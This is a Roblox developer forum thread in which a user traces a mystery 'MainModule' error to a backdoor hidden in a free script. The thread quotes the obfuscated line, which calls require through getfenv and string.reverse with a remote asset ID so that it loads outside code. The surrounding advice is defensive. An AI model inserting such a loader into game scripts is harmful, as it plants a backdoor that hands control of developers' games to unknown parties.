Weird error coming from script that doesn't exist

Hello DevForum Members!
So I am trying to make a game, but there is an error that appears every time I start/run the game. The error says it comes from Model.MainModule, but I haven’t got any script that’s called that neither can I find one when I run the game.

This is the error:
Erro

Any help is appreciated!

Are you using any free models?

There’s a good chance it’s a virus script

No, I am not using any free models that I’m aware of.

Have you used a free model at all?

(sorry for the late resonse)

No I haven’t used any free models.

Also I just thought, make sure your plugins are legit, it could be a backdoor from a malicious plugin

1 Like

I have also checked my plugins, but they are all legit.

If you’re really sure this isn’t a free asset u downloaded or no scripts are in the game, There’s a chance this is Roblox’s fault, But another thing to mention is that you might get error if:

• Your Studio isn’t up to date
  • Your Wifi connection is getting interrupted or it’s turned off

Try Re-installing studio or fixing your wifi, but then again make sure you don’t see any malicious scripts in your game.

Edit: It could also be that a plugin failed loading, so it’s not your fault

Ok, then try what @iFlameyz suggested

Looks like its comming from a require(assetId) call. Have u used any “MainModule requires” in your scripts?

I think I found it, the problem was that I did have a kind of free script and it looked like a normal script, but if you scrolled to the left there was a thing that was saying:
getfenv()[string.reverse("\101\114\105\117\113\101\114")](5770442639)

That looks like something that comes from a free model. Also, mark a post as the solution instead of putting [SOLVED] in title.
A Checkmark is added to the post title. No need to add [SOLVED]

1 Like

There you go! Always check the scripts on a free model. Even if the model creator looks legit.

Personally I only use models from Roblox

1 Like